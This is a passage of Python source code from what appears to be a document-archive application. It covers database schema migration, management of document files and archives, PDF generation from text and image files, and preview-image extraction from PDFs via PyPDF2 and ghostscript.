    def __init__(self, creator_dao: CreatorDao):
        '''
        Stores the injected creator dao used for all database access.
        '''
        self.creator_dao = creator_dao
    def find_all_active_creators(self):
        '''
        Fetches every creator whose visible flag is set.
        '''
        dao = self.creator_dao
        return dao.find_all_visible()
def get_version(connection):
    '''
    TODO: Use registry dao
    Reads the current database version from the registry table
    '''
    version_query = select([REGISTRY_TABLE])\
        .where(REGISTRY_TABLE.c.schluessel == 'version')  # @UndefinedVariable
    row = connection.execute(version_query).fetchone()
    return row[REGISTRY_TABLE.c.wert]  # @UndefinedVariable
class BaseUpdate():
    '''
    Base class for the database migration steps; provides the shared
    set_version method.
    '''
    def __init__(self, connection, dialect):
        self.connection = connection
        self.dialect = dialect
    def set_version(self, version):
        '''
        Writes the given version string into the registry table.
        '''
        stmt = update(REGISTRY_TABLE)\
            .where(REGISTRY_TABLE.c.schluessel == 'version')\
            .values(wert=version)  # @UndefinedVariable
        self.connection.execute(stmt)
class UpdateFrom0_3(BaseUpdate):
    # pylint: disable=invalid-name
    '''
    Migration step from schema version 0.3 to 0.4; removes some
    annoying not null constraints.
    '''
    dialect_specifics = {'sqlite': '',
                         'postgresql': 'alter table dokument alter seite drop not null, ' +
                         'alter dateityp drop not null'}
    def run(self):
        '''
        Executes the dialect specific DDL and bumps the stored version.
        '''
        ddl = self.dialect_specifics[self.dialect]
        self.connection.execute(text(ddl))
        self.set_version('0.4')
@singleton
class DatabaseUpgradeService():
    '''
    Handles updating the database schema to the current version.
    '''
    @inject
    def __init__(self, db_engine: Engine):
        '''
        Stores the injected database engine.
        '''
        self.db_engine = db_engine
    def is_update_necessary(self):
        '''
        Returns True when the stored schema version differs from
        CURRENT_VERSION.
        '''
        connection = self.db_engine.connect()
        stored_version = get_version(connection)
        connection.close()
        return stored_version != CURRENT_VERSION
    def run_update(self):
        '''
        Applies all pending migration steps inside one transaction.
        Rolls back and re-raises when any step fails.
        '''
        connection = self.db_engine.connect()
        transaction = connection.begin()
        try:
            current = get_version(connection)
            while current != CURRENT_VERSION:
                # Migration classes follow the naming scheme UpdateFromX_Y
                # and live in this module.
                updater_name = 'UpdateFrom' + current.replace('.', '_')
                updater_class = getattr(sys.modules[self.__module__], updater_name)
                updater_class(connection, self.db_engine.name).run()
                current = get_version(connection)
        except Exception as exception:
            transaction.rollback()
            raise exception
        transaction.commit()
        connection.close()
# Names for the strategies used to split a plain text file into paragraphs.
LINES_ARE_PARAGRAPHS = 'Lines are paragraphs'
EMPTY_LINES_ARE_SEPARATORS = 'Empty lines are separators'
SHORT_LINES_ARE_PARBREAKS = 'Short lines are paragraph breaks'
class TextObject(object):
    '''
    Abstract representation of a text file to extract paragraphs
    for pdf generation.

    Reads the whole file on construction and records statistics
    (line count, empty line count, longest line) that are later used
    to guess a sensible paragraph splitting strategy.
    '''
    # A line consisting only of whitespace counts as empty. Note that
    # every line read from the file still carries its newline character.
    _re_empty_line = re.compile(r"^\s+$")
    def __init__(self, file_name):
        source = self._open_file(file_name)
        self.lines = []
        self.number_of_lines = 0
        self.empty_lines = 0
        self.max_length = 0
        for line in source:
            self._add_line(line)
        source.close()
    def _open_file(self, file_name):
        '''
        Determines if we have an old latin1 file or a new unicode file.
        '''
        # pylint: disable=no-self-use
        # Renamed the local from the builtin-shadowing 'file' to 'source'.
        try:
            source = open(file_name, 'r')
            source.read()
        except UnicodeDecodeError:
            source.close()
            return codecs.open(file_name, 'r', 'latin1')
        source.close()
        return open(file_name, 'r')
    def _add_line(self, line):
        # Collect the line and update the statistics used by
        # get_paragraphs().
        self.lines.append(line)
        self.number_of_lines += 1
        if self._is_line_empty(line):
            self.empty_lines += 1
            return
        if len(line) > self.max_length:
            self.max_length = len(line)
    def _is_line_empty(self, line):
        return self._re_empty_line.match(line)
    def _get_short_line_length(self):
        # Lines shorter than 80% of the longest line are treated as
        # paragraph ends by _use_short_lines_as_separators().
        return self.max_length * 0.8
    def get_paragraphs(self):
        '''
        Tries to split the text file into paragraphs according
        to some file characteristics. May not be one hundred percent
        accurate.
        '''
        if self.max_length > 120:
            # Very long lines: the file was saved without hard wrapping,
            # so every non-empty line already is a paragraph.
            return self._use_lines_as_paragraphs()
        if self.empty_lines > 2:
            return self._use_empty_lines_as_separators()
        return self._use_short_lines_as_separators()
    def _use_lines_as_paragraphs(self):
        # Removed the unused 'counter' variable of the original version
        # and replaced the manual append loop by a comprehension.
        return [line for line in self.lines
                if not self._is_line_empty(line)]
    def _use_empty_lines_as_separators(self):
        # Joins consecutive non-empty lines; an empty line closes the
        # current paragraph. (Unused 'counter' variable removed.)
        paragraphs = []
        lines = []
        for line in self.lines:
            if self._is_line_empty(line):
                paragraphs.append("".join(lines))
                lines = []
            else:
                lines.append(line)
        paragraphs.append("".join(lines))
        return paragraphs
    def _use_short_lines_as_separators(self):
        # A notably short line is interpreted as the last line of its
        # paragraph. (Unused 'counter' variable removed.)
        short = self._get_short_line_length()
        paragraphs = []
        lines = []
        for line in self.lines:
            lines.append(line)
            if len(line) < short:
                paragraphs.append("".join(lines))
                lines = []
        paragraphs.append("".join(lines))
        return paragraphs
@singleton
class DocumentFileManager(object):
    '''
    A simple class to manage document files. It provides
    all the methods needed to create, delete or find files
    referenced by a document file info.
    It also supports handling of derived files (pdfs, thumbnails etc.)
    '''
    # pylint: disable=no-self-use
    @inject
    def __init__(self, config_service: Config,
                 document_file_info_dao: DocumentFileInfoDao):
        '''
        Constructor reads the configuration from the config_service
        '''
        self.base_dir = config_service.document_dir
        self.archives = config_service.archive_dirs
        self.document_file_info_dao = document_file_info_dao
        # Dispatch table mapping a generation type to its path builder;
        # the generation type constants are defined later in this module.
        self.path_handler = {THUMBNAIL: self._get_thumb_path,
                             DISPLAY_IMAGE: self._get_display_path,
                             DOCUMENT_PDF: self._get_pdf_path}
        self.logger = logging.getLogger(
            "alexandriabase.services.documentfilemanager.DocumentFileManager")
    def delete_file(self, document_file_info):
        '''
        Does not physically delete files but appends their file name
        with .deleted
        '''
        file_path = self.get_file_path(document_file_info)
        shutil.move(file_path, "%s.deleted" % file_path)
    def add_file(self, file_path, document_file_info):
        '''
        Adds a file to the DOCUMENTBASEDIR, renaming it according
        to the information in the document file info and deletes
        the original file
        '''
        directory_path = self._create_type_dir_path(document_file_info)
        if not os.path.exists(directory_path):
            os.makedirs(directory_path)
        # Copy + remove instead of move: works across file systems.
        shutil.copy(file_path, os.path.join(directory_path, document_file_info.get_file_name()))
        os.remove(file_path)
    def get_file_path(self, document_file_info):
        '''
        Searches in the BASEDIR and then in the ARCHIVES for the
        referenced file. Raises a DocumentFileNotFound exception
        if not found.
        '''
        self.logger.debug("Searching for file %s", document_file_info)
        basedir_path = self._create_basedir_path(document_file_info)
        self.logger.debug("Searching in %s", basedir_path)
        if os.path.isfile(basedir_path):
            return basedir_path
        expanded_short_path = self._create_archive_sub_path(document_file_info)
        for archive in self.archives:
            archive_path = os.path.join(archive, expanded_short_path)
            self.logger.debug("Searching in %s", archive_path)
            if os.path.isfile(archive_path):
                return archive_path
        raise DocumentFileNotFound(document_file_info)
    def get_generated_file_path(self, document_file_info, generation_type):
        '''
        Returns the path of the generated file belonging to the master
        file given in the document_file_info of the given generation_type
        '''
        return self.path_handler[generation_type](document_file_info)
    def _get_thumb_path(self, document_file_info):
        '''
        Returns the location of the thumbnail path
        '''
        return self._get_path(document_file_info, "thumb", "png")
    def _get_display_path(self, document_file_info):
        '''
        Returns the location of the display image path
        '''
        return self._get_path(document_file_info, "display", "png")
    def _get_pdf_path(self, document_file_info):
        '''
        Returns the location of the pdf file path
        '''
        # The pdf path is always derived from the file info whose id equals
        # the document id; other file infos are resolved via the dao first.
        if document_file_info.id == document_file_info.document_id:
            file_info = document_file_info
        else:
            file_info = self.document_file_info_dao.get_by_id(document_file_info.document_id)
        return self._get_path(file_info, "pdf", "pdf")
    def _get_path(self, document_file_info, subdir, extension):
        '''
        Use regular expressions to manipulate the master file
        path for derived files
        '''
        file_path = self.get_file_path(document_file_info)
        ftype = document_file_info.filetype
        # Inserts the subdir between the type directory and the 8-digit
        # file name, e.g. .../tif/00000042.tif -> .../tif/thumb/...
        subdir_path = re.sub(r"/%s/(?=\d{8}\.%s)" % (ftype, ftype),
                             r"/%s/%s/" % (ftype, subdir),
                             file_path)
        # Then swap the file extension for the derived file's extension.
        return re.sub(r"\.%s$" % ftype, ".%s" % extension, subdir_path)
    def get_generated_file(self, document_file_info, generation_type):
        '''
        Returns the file as bytes if it exists. May throw a FileNotFound exception.
        '''
        path = self.get_generated_file_path(document_file_info, generation_type)
        file = open(path, mode="rb")
        content = file.read()
        file.close()
        return content
    def add_generated_file(self, byte_buffer, document_file_info, generation_type):
        '''
        Add the generated file at its appropriate place.
        '''
        path = self.get_generated_file_path(document_file_info, generation_type)
        path_dir = os.path.dirname(path)
        try:
            os.makedirs(path_dir)
        except FileExistsError:
            # Target directory already exists; nothing to do.
            pass
        file = open(path, mode="wb")
        file.write(byte_buffer)
        file.close()
    def delete_generated_file(self, document_file_info, generation_type):
        '''
        Removes the generated file if it exists. Otherwise does nothing.
        Also nothing happens when the original document just has is a single
        pdf file and there is a request to delete the generated pdf file for
        the document.
        '''
        try:
            os.unlink(self.get_generated_file_path(document_file_info, generation_type))
        except FileNotFoundError:
            pass
    def _create_basedir_path(self, document_file_info):
        '''
        Creates a path for the file in the base dir
        '''
        return os.path.join(self.base_dir,
                            self._create_path_with_typedir(document_file_info))
    def _create_type_dir_path(self, document_file_info):
        # Directory for a file type below the base dir, e.g. <base>/tif.
        return os.path.join(self.base_dir,
                            document_file_info.filetype)
    def _create_path_with_typedir(self, document_file_info):
        '''
        Helper function for path construction
        '''
        return os.path.join(
            document_file_info.filetype,
            document_file_info.get_file_name())
    def _create_archive_sub_path(self, document_file_info):
        '''
        When documents are archived, then they are stored in 1000 blocks.
        The first 1000 files (0-999) go into the directory 1000, then next
        1000 files (1000-1999) into the directory 2000 and so on.
        '''
        dirnumber = ((document_file_info.id + 1000) // 1000) * 1000
        return os.path.join("%d" % dirnumber,
                            self._create_path_with_typedir(document_file_info))
@singleton
class TextPdfHandler(object):
    '''
    Handler class for text files. Converts text into paragraph
    flowables.
    '''
    _re_empty_line = re.compile(r"^\s+$")
    @inject
    def __init__(self, document_file_manager: DocumentFileManager):
        '''
        Sets up the paragraph styles for title, subtitle and body text.
        '''
        shared_layout = dict(spaceBefore=10,
                             spaceAfter=10,
                             leftIndent=2 * cm,
                             rightIndent=2 * cm)
        self.first_paragraph = ParagraphStyle('First',
                                              fontName='Helvetica-Bold',
                                              fontSize=18,
                                              leading=20,
                                              **shared_layout)
        self.second_paragraph = ParagraphStyle('Second',
                                               fontName='Helvetica-Bold',
                                               fontSize=16,
                                               leading=18,
                                               **shared_layout)
        self.normal_style = ParagraphStyle('Normal',
                                           fontName='Helvetica',
                                           fontSize=12,
                                           leading=16,
                                           **shared_layout)
        self.document_file_manager = document_file_manager
        self.styles = [self.first_paragraph, self.second_paragraph]
    def add_document_file_to_story(self, story, file_info, margins):
        '''
        The handler method. Appends one Paragraph flowable per text
        paragraph: the first two paragraphs get title/subtitle styles,
        the rest body style. The margins parameter is unused because
        paragraphs align themselves to the enclosing frame.
        '''
        # pylint: disable=unused-argument
        file_name = self.document_file_manager.get_file_path(file_info)
        paragraphs = TextObject(file_name).get_paragraphs()
        for index, par in enumerate(paragraphs):
            if index == 0:
                style = self.first_paragraph
            elif index == 1:
                style = self.second_paragraph
            else:
                style = self.normal_style
            story.append(Paragraph(par, style))
        return story
@singleton
class GraphicsPdfHandler(object):
    '''
    Handler for graphic formats.
    '''
    @inject
    def __init__(self, document_file_manager: DocumentFileManager):
        '''
        Stores the file manager and the usable page frame size (points).
        '''
        self.document_file_manager = document_file_manager
        self.frame_width = 583
        self.frame_height = 829
    def add_document_file_to_story(self, story, file_info, margins):
        '''
        The handler method. Images larger than the page frame are scaled
        down to fit; smaller images are rendered in their natural size
        derived from the file resolution.
        '''
        file = self.document_file_manager.get_file_path(file_info)
        available_width = self.frame_width - margins * 2 * cm
        available_height = self.frame_height - margins * 2 * cm
        image = PdfImage(file)
        too_wide = image.imageWidth > available_width
        too_tall = image.imageHeight > available_height
        if too_wide or too_tall:
            # Uniform scale factor that makes the image fit both ways.
            factor = min(available_width / image.imageWidth,
                         available_height / image.imageHeight)
            story.append(PdfImage(file,
                                  image.imageWidth * factor,
                                  image.imageHeight * factor))
        else:
            # Natural size in points; fall back to 300 dpi when the file
            # carries no resolution information.
            resolution = file_info.resolution or 300.0
            story.append(PdfImage(file,
                                  image.imageWidth / resolution * inch,
                                  image.imageHeight / resolution * inch))
        return story
@singleton
class DocumentPdfGenerationService(object):
    '''
    Service to create a pdf file from the systematic database
    entries
    '''
    # pylint: disable=no-self-use
    @inject
    def __init__(self,
                 document_file_info_dao: DocumentFileInfoDao,
                 document_file_manager: DocumentFileManager,
                 pdf_handlers: baseinjectorkeys.PDF_HANDLERS_KEY):
        '''
        Constructor
        '''
        self.document_file_info_dao = document_file_info_dao
        self.document_file_manager = document_file_manager
        # Maps a file type to a handler providing add_document_file_to_story.
        self.pdf_handlers = pdf_handlers
    def generate_document_pdf(self, document):
        '''
        The public method to create a pdf file for a document
        Returns the pdf as byte buffer
        '''
        file_infos = self.document_file_info_dao.get_file_infos_for_document(document.id)
        return self._run_generation(file_infos)
    def generate_file_pdf(self, document_file_info):
        '''
        The public method to create a pdf file for just one document file
        Returns the pdf as byte buffer
        '''
        return self._run_generation([document_file_info])
    def _run_generation(self, file_infos):
        # Text content gets page margins; image-only content fills the page.
        if self._contains_text_content(file_infos):
            margins = 1.5
        else:
            margins = 0.0
        pdf_list = []
        story = []
        for file_info in file_infos:
            if file_info.filetype == 'pdf':
                # Existing pdf files are merged verbatim; first flush the
                # flowables collected so far so the page order is preserved.
                if story:
                    pdf_list.append(self._build_pdf(story, margins))
                    story = []
                path = self.document_file_manager.get_file_path(file_info)
                file = open(path, "rb")
                pdf_list.append(file.read())
                file.close()
                continue
            if file_info.filetype in self.pdf_handlers.keys():
                story = self.pdf_handlers[file_info.filetype].\
                    add_document_file_to_story(story, file_info, margins)
            else:
                # No handler registered: insert a visible warning paragraph.
                story = self._add_no_handler_warning(story, file_info)
        if story:
            pdf_list.append(self._build_pdf(story, margins))
        return self._join_pdfs(pdf_list)
    def _build_pdf(self, story, margins):
        # Renders the collected flowables into a single pdf (as bytes).
        file = BytesIO()
        doc = SimpleDocTemplate(file,
                                pagesize=A4,
                                leftMargin=margins * cm,
                                rightMargin=margins * cm,
                                topMargin=margins * cm,
                                bottomMargin=margins * cm)
        doc.build(story)
        return file.getvalue()
    def _join_pdfs(self, pdf_list):
        # Merges several pdfs (as bytes); skips the merger overhead when
        # there is just one pdf.
        if len(pdf_list) == 1:
            return pdf_list[0]
        pdf_merger = PdfFileMerger()
        for pdf in pdf_list:
            pdf_file = BytesIO(pdf)
            pdf_merger.append(pdf_file)
        output = BytesIO()
        pdf_merger.write(output)
        pdf_merger.close()
        return output.getvalue()
    def _contains_text_content(self, file_infos):
        # True when at least one of the files is a plain text file.
        for file_info in file_infos:
            if file_info.filetype == 'txt':
                return True
        return False
    def _add_no_handler_warning(self, story, file_info):
        # Fallback flowable for file types without a registered handler.
        style = ParagraphStyle('Normal', None)
        style.fontSize = 18
        style.leading = 20
        style.spaceBefore = 12
        style.spaceAfter = 12
        paragraph = Paragraph("It is not possible to represent document file %s as pdf."
                              % file_info, style)
        story.append(paragraph)
        return story
# Generation type keys for derived document files; used as keys of
# DocumentFileManager.path_handler.
THUMBNAIL = 'thumbnail'
DISPLAY_IMAGE = 'display_image'
DOCUMENT_PDF = 'document_pdf'
class DocumentFileNotFound(Exception):
    '''
    Exception class for not found files
    '''

    def __init__(self, document_file_info):
        # Chain to Exception so args/str()/logging carry the file info
        # (the original suppressed super-init-not-called instead).
        super().__init__(document_file_info)
        # The file info of the missing file; may be None (see FileProvider).
        self.document_file_info = document_file_info
class NoImageGeneratorError(Exception):
    '''
    Raised when no image generator is registered for a file type.
    '''

    def __init__(self, filetype):
        # Chain to Exception so args/str()/logging carry the file type
        # (the original suppressed super-init-not-called instead).
        super().__init__(filetype)
        # The file type without a registered image generator.
        self.filetype = filetype
class ImageExtractionFailure(Exception):
    '''
    Exception class for failed image extraction
    '''

    def __init__(self, file_path, return_value):
        # Chain to Exception so args/str()/logging carry the details
        # (the original suppressed super-init-not-called instead).
        super().__init__(file_path, return_value)
        self.file_path = file_path
        # Return value of the failed external extraction call.
        self.return_value = return_value
@singleton
class DocumentFileImageGenerator:
    '''
    Main class for image generation. There are handlers for different
    file types to create an image (there should be more). Throws a
    NoImageGeneratorError if it is not possible to create an image from
    a file.
    '''
    @inject
    def __init__(self, image_generators: baseinjectorkeys.IMAGE_GENERATORS_KEY):
        # Maps a file type to its image generator object.
        self.image_generators = image_generators
    def generate_image(self, document_file_info):
        '''
        Invokes the appropriate handler for the file type to generate
        an image.

        Raises NoImageGeneratorError when no handler is registered for
        the file type.
        '''
        try:
            generator = self.image_generators[document_file_info.filetype]
        except KeyError:
            raise NoImageGeneratorError(document_file_info.filetype)
        # BUGFIX: only the dictionary lookup is guarded now. The original
        # wrapped the handler call in the same try block, so a KeyError
        # raised *inside* a handler was misreported as a missing handler.
        return generator.generate_image(document_file_info)
@singleton
class FileProvider():
    '''
    Provides the content of different derived files for documents. The
    files will be generated if they do not already exist. This should
    be relatively fail safe, provided that the original files exist.
    '''
    # pylint: disable=no-self-use
    @inject
    def __init__(self,
                 document_file_manager: DocumentFileManager,
                 document_file_info_dao: DocumentFileInfoDao,
                 document_pdf_generator: DocumentPdfGenerationService,
                 document_file_image_generator: DocumentFileImageGenerator):
        self.document_file_manager = document_file_manager
        self.document_file_info_dao = document_file_info_dao
        self.document_pdf_generator = document_pdf_generator
        self.document_file_image_generator = document_file_image_generator
    def get_pdf(self, document):
        '''
        Returns (and creates if necessary) the pdf file for a document.
        TODO: Bug if there is no file attached yet to the document
        '''
        try:
            document_file_info = self.document_file_info_dao.get_by_id(document.id)
        except NoSuchEntityException:
            # Quick fix, reconsider
            raise DocumentFileNotFound(None)
        try:
            return self.document_file_manager.get_generated_file(document_file_info, DOCUMENT_PDF)
        except FileNotFoundError:
            pass
        # if we get here, we have to generate the pdf
        pdf = self.document_pdf_generator.generate_document_pdf(document)
        self.document_file_manager.add_generated_file(pdf, document_file_info, DOCUMENT_PDF)
        return pdf
    def get_thumbnail(self, document_file_info):
        '''
        Returns (and creates if necessary) the thumbnail file for a document file
        '''
        try:
            return self.document_file_manager.get_generated_file(document_file_info, THUMBNAIL)
        except FileNotFoundError:
            pass
        try:
            pil_img = self.document_file_image_generator.generate_image(document_file_info)
        except NoImageGeneratorError:
            # Fall back to a textual placeholder image.
            pil_img = self._create_no_thumbnail_image(document_file_info)
        pil_img.thumbnail((200, 258))
        if pil_img.mode == "CMYK":
            # PNG cannot store CMYK; convert before saving.
            pil_img = pil_img.convert("RGB")
        file_buffer = BytesIO()
        try:
            pil_img.save(file_buffer, 'png')
        except IOError as error:
            print("Error saving file %s" % document_file_info)
            raise error
        thumbnail = file_buffer.getvalue()
        self.document_file_manager.add_generated_file(thumbnail, document_file_info, THUMBNAIL)
        return thumbnail
    def get_display_image(self, document_file_info):
        '''
        Returns (and creates if necessary) a display image file for a document file
        '''
        try:
            return self.document_file_manager.get_generated_file(document_file_info, DISPLAY_IMAGE)
        except FileNotFoundError:
            pass
        try:
            pil_img = self.document_file_image_generator.generate_image(document_file_info)
        except NoImageGeneratorError:
            # Fall back to a textual placeholder image.
            pil_img = self._create_no_display_image(document_file_info)
        resolution = document_file_info.resolution
        if resolution is None:
            resolution = 72
        # Scale to a uniform 108 dpi display size.
        scaling_factor = 108.0 / resolution
        scaled_width = int(pil_img.size[0] * scaling_factor)
        scaled_height = int(pil_img.size[1] * scaling_factor)
        pil_img = pil_img.resize((scaled_width, scaled_height))
        if pil_img.mode == "CMYK":
            # PNG cannot store CMYK; convert before saving.
            pil_img = pil_img.convert("RGB")
        file_buffer = BytesIO()
        pil_img.save(file_buffer, 'png')
        display_image = file_buffer.getvalue()
        self.document_file_manager.add_generated_file(display_image,
                                                      document_file_info,
                                                      DISPLAY_IMAGE)
        return display_image
    def _create_no_thumbnail_image(self, document_file_info):
        # Placeholder shown when no thumbnail can be generated.
        return self._create_placeholder_image("Keine Vorschau", document_file_info)
    def _create_no_display_image(self, document_file_info):
        # Placeholder shown when no display image can be generated.
        return self._create_placeholder_image("Keine Graphik", document_file_info)
    def _create_placeholder_image(self, headline, document_file_info):
        # Shared implementation of the two placeholder images; they only
        # differed in their first text line, so the duplicate drawing code
        # was consolidated here.
        img = Image.new('P', (400, 440), color=255)
        font = ImageFont.truetype(os.path.join(fontdir, "Arial_Bold.ttf"), 48)
        draw = ImageDraw.Draw(img)
        draw.text((10, 60), headline, font=font, fill=0)
        draw.text((10, 120), "für Datei", font=font, fill=0)
        draw.text((10, 180), document_file_info.get_file_name(), font=font, fill=0)
        return img
class GraphicsImageGenerator:
    '''
    A simple image "generator" for graphics files: it just opens the
    graphics file itself as a PIL image.
    '''
    @inject
    def __init__(self, document_file_manager: DocumentFileManager):
        self.document_file_manager = document_file_manager
    def generate_image(self, document_file_info):
        '''
        Opens the file as PIL image.
        '''
        file_path = self.document_file_manager.get_file_path(document_file_info)
        return Image.open(file_path)
@singleton
class PdfImageExtractor(object):
    '''
    Creates PIL images from pdf files. First tries to extract
    image data directly from the pdf file, then, when this fails,
    uses ghostscript to render the first page of the pdf.
    The code is mostly based on information found at
    http://stackoverflow.com/questions/2693820/extract-images-from-pdf-without-resampling-in-python
    There is a lot of exception catching and handling in this class
    because there are pdfs out in the wild you would not believe could
    exist. This class consistently throws an ImageExtractionFailure
    when something goes fatally wrong. But be aware it might return a
    blank image without notifying you of any failure. Or the
    image might fail when working on it.
    '''
    # pylint: disable=no-self-use
    def __init__(self):
        # Maps pdf image stream filter names to the extraction method
        # that can decode image data stored with that filter.
        self.data_extractors = {'/FlateDecode': self._decode_data,
                                '/DCTDecode': self._extract_jpg_data,
                                '/JPXDecode': self._extract_jpg_data,
                                '/CCITTFaxDecode': self._extract_ccitt_fax}
        self.logger = logging.getLogger()
    def extract_image(self, path):
        '''
        The public method to extract an image from a pdf file.
        This is much too sophisticated since in 99.9% of the cases
        we need ghostscript to extract the image file, either because
        there is text on the page or there are multiple images. Or
        there are errors only ghostscript is able to handle.
        But since the code is written, we use it.
        '''
        # pylint: disable=broad-except
        # pylint: disable=too-many-return-statements
        try:
            # NOTE(review): the file handle opened here is never closed
            # explicitly; pyPDF2 reads from it lazily while pages are
            # accessed - confirm before converting to a context manager.
            pdf_reader = PdfFileReader(open(path, "rb"))
        except Exception as error:
            self.logger.debug("Trying ghostscript due to pyPDF2 read failure (%s).", error)
            return self._extract_using_ghostscript(path)
        if pdf_reader.isEncrypted:
            # Encrypted pdfs can't be inspected here; render instead.
            self.logger.debug("Trying ghostscript on encrypted pdf.")
            return self._extract_using_ghostscript(path)
        try:
            page0 = pdf_reader.getPage(0)
        except Exception as error:
            self.logger.debug("Trying ghostscript due to page read failure (%s).", error)
            return self._extract_using_ghostscript(path)
        try:
            page_text = page0.extractText()
        except Exception as error:
            self.logger.debug("Trying ghostscript due " +
                              "to error extracting text from pdf (%s).", error)
            return self._extract_using_ghostscript(path)
        if page_text != '':
            # Text on the page can't be reproduced by extracting an
            # embedded image, so the page must be rendered.
            return self._extract_using_ghostscript(path)
        image_objects = self._find_image_objects(page0)
        if len(image_objects) != 1:
            # If we have zero images, we need to use ghostscript
            # If there are several images, it is too complicated to join them
            self.logger.debug("Using ghostscript (number of extractable " +
                              "images is %d).", len(image_objects))
            return self._extract_using_ghostscript(path)
        image_object = image_objects[0]
        try:
            filter_type = image_object["/Filter"]
            if not isinstance(filter_type, list):
                # Normalize a single filter entry to a sequence.
                filter_type = (filter_type,)
            for handler_key in self.data_extractors:
                if handler_key in filter_type:
                    self.logger.debug("Extracting for filter type %s", filter_type)
                    return self.data_extractors[handler_key](image_object)
        except Exception as error:
            if self.logger.getEffectiveLevel() == logging.DEBUG:
                self.logger.exception("Exception running extractor (%s).", error)
        # if we did not succeed for whatever reason, we fall back
        # to interpreting the pdf file using ghostscript
        self.logger.debug("Using ghostscript due to exception.")
        return self._extract_using_ghostscript(path)
    def _extract_using_ghostscript(self, pdf_path):
        '''
        We can't successfully extract a wrapped image, so we have to render the pdf ourselves.
        Raises ImageExtractionFailure when ghostscript exits with a non-zero status.
        '''
        # NamedTemporaryFile is only used to obtain a unique file name;
        # the actual file content is written by ghostscript below.
        tmp_file = tempfile.NamedTemporaryFile("wb")
        path = tmp_file.name
        tmp_file.close()
        # NOTE(review): this devnull handle is never closed.
        stdio = open(os.devnull, 'wb')
        return_value = call(["gs",
                             "-sDEVICE=png16m",
                             "-dNOPAUSE", "-dFirstPage=1",
                             "-dLastPage=1",
                             "-sOutputFile=%s" % path,
                             "-r300",
                             "-q",
                             pdf_path,
                             "-c",
                             "quit"],
                            stdout=stdio,
                            stderr=stdio)
        if return_value != 0:
            # pylint: disable=bare-except
            try:
                # Best effort cleanup of the (possibly partial) output file.
                os.unlink(path)
            except:
                pass
            raise ImageExtractionFailure(path, return_value)
        img = Image.open(path)
        os.unlink(path)
        return img
    def _generate_tiff_header_for_ccitt_fax(self, width, height, data_size, compression):
        '''
        Auxiliary method to create a tiff header from meta data information.
        Layout: byte order, magic number, IFD offset, then 8 IFD entries of
        (tag, type, count, value) and the terminating next-IFD offset.
        '''
        tiff_header_struct = '<' + '2s' + 'h' + 'l' + 'h' + 'hhll' * 8 + 'l'
        return struct.pack(tiff_header_struct,
                           # Byte order indication: little endian
                           b'II',
                           # Version number (always 42)
                           42,
                           # Offset to first IFD
                           8,
                           # Number of tags in IFD
                           8,
                           # ImageWidth, LONG, 1, width
                           256, 4, 1, width,
                           # ImageLength, LONG, 1, length
                           257, 4, 1, height,
                           # BitsPerSample, SHORT, 1, 1
                           258, 3, 1, 1,
                           # Compression, SHORT, 1, 4 = CCITT Group 4 fax encoding
                           259, 3, 1, compression,
                           # Threshholding, SHORT, 1, 0 = WhiteIsZero
                           262, 3, 1, 0,
                           # StripOffsets, LONG, 1, len of header
                           273, 4, 1, struct.calcsize(tiff_header_struct),
                           # RowsPerStrip, LONG, 1, length
                           278, 4, 1, height,
                           # StripByteCounts, LONG, 1, size of image
                           279, 4, 1, data_size,
                           # last IFD
                           0
                          )
    def _extract_ccitt_fax(self, image_object):
        '''
        Tiff data may be stored as raw fax data without tiff header,
        so it is necessary to create a tiff header for the data to
        let PIL interpret the data correctly
        '''
        # pylint: disable=protected-access
        width = image_object['/Width']
        height = image_object['/Height']
        data = image_object._data # sorry, getData() does not work for CCITTFaxDecode
        #length = image_object['/Length']
        #length = 4711
        # Map the pdf /K encoding parameter to the tiff compression tag
        # value expected by the header generator.
        compression_map = {-1: 4, 0: 2, 1: 3}
        compression = compression_map[image_object['/DecodeParms']['/K']]
        tiff_header = self._generate_tiff_header_for_ccitt_fax(width,
                                                               height,
                                                               len(data),
                                                               compression)
        return Image.open(BytesIO(tiff_header + data))
    def _extract_jpg_data(self, image_object):
        '''
        There is (theoretically) no decoding to be done, so we
        use the raw stream data (_data) without the decoding
        hidden behind getData().
        And then we let PIL determine from the header data what to do.
        This does not work reliably, so we have to test the image
        data and provoke an exception if it did not work
        Well, it should work correctly. One of the sample files
        generated with tiff2pdf does not work correctly, but this
        seems to be the fault of tiff2pdf. Anyway, there might
        be more corrupt pdfs in the wild, so we retain the test code.
        '''
        # pylint: disable=protected-access
        data = image_object._data
        image = Image.open(BytesIO(data))
        # Simple check that the image data could be interpreted and can be written
        # as png file
        file = BytesIO()
        image.save(file, 'png')
        file.close()
        return image
    def _decode_data(self, image_object):
        '''
        We have just raw data, so we let pyPDF2 do the
        decoding and then extract size and
        colorspace from the meta data to give PIL the
        information to correctly decode the data
        '''
        size = (image_object['/Width'], image_object['/Height'])
        data = image_object.getData()
        if image_object['/ColorSpace'] == '/DeviceRGB':
            self.logger.debug("Extracting RGB color image")
            mode = "RGB"
        else:
            self.logger.debug("Extracting black and white image")
            mode = "P"
        return Image.frombytes(mode, size, data)
    def _find_image_objects(self, page):
        '''
        Loops over the objects of the page and collects everything
        that declares itself as an image. Returns an empty list when
        the page structure is missing or unreadable.
        '''
        image_objects = []
        try:
            if not '/Resources' in page:
                self.logger.debug("PdfReadError: Missing /Resources in page.")
                return image_objects
            if not '/XObject' in page['/Resources']:
                self.logger.debug("No /XObject in /Resources.")
                return image_objects
        except PdfReadError as error:
            self.logger.debug("PdfReadError: %s", error)
            return image_objects
        x_object = page['/Resources']['/XObject'].getObject()
        for obj in x_object:
            if '/Subtype' in x_object[obj] and x_object[obj]['/Subtype'] == '/Image':
                image_objects.append(x_object[obj])
        return image_objects
class PdfImageGenerator:
    '''
    Creates a preview image from a pdf file.
    '''
    @inject
    def __init__(self, document_file_manager: DocumentFileManager,
                 pdf_image_extractor: PdfImageExtractor):
        self.document_file_manager = document_file_manager
        self.pdf_image_extractor = pdf_image_extractor
    def generate_image(self, document_file_info):
        '''
        Uses the pdf image extractor to get an image from the pdf file.
        '''
        return self.pdf_image_extractor.extract_image(
            self.document_file_manager.get_file_path(document_file_info))
@singleton
class TextImageGenerator:
    '''
    To convert a text file into an image, this handler first
    creates a pdf file from the text file and then extracts
    an image from the pdf file.
    '''
    @inject
    def __init__(self,
                 pdf_image_extractor: PdfImageExtractor,
                 pdf_generator: DocumentPdfGenerationService):
        self.pdf_image_extractor = pdf_image_extractor
        self.pdf_generator = pdf_generator
    def generate_image(self, document_file_info):
        '''
        Writes a temporary pdf file and then uses the pdf image extractor
        to create an image from the pdf.
        '''
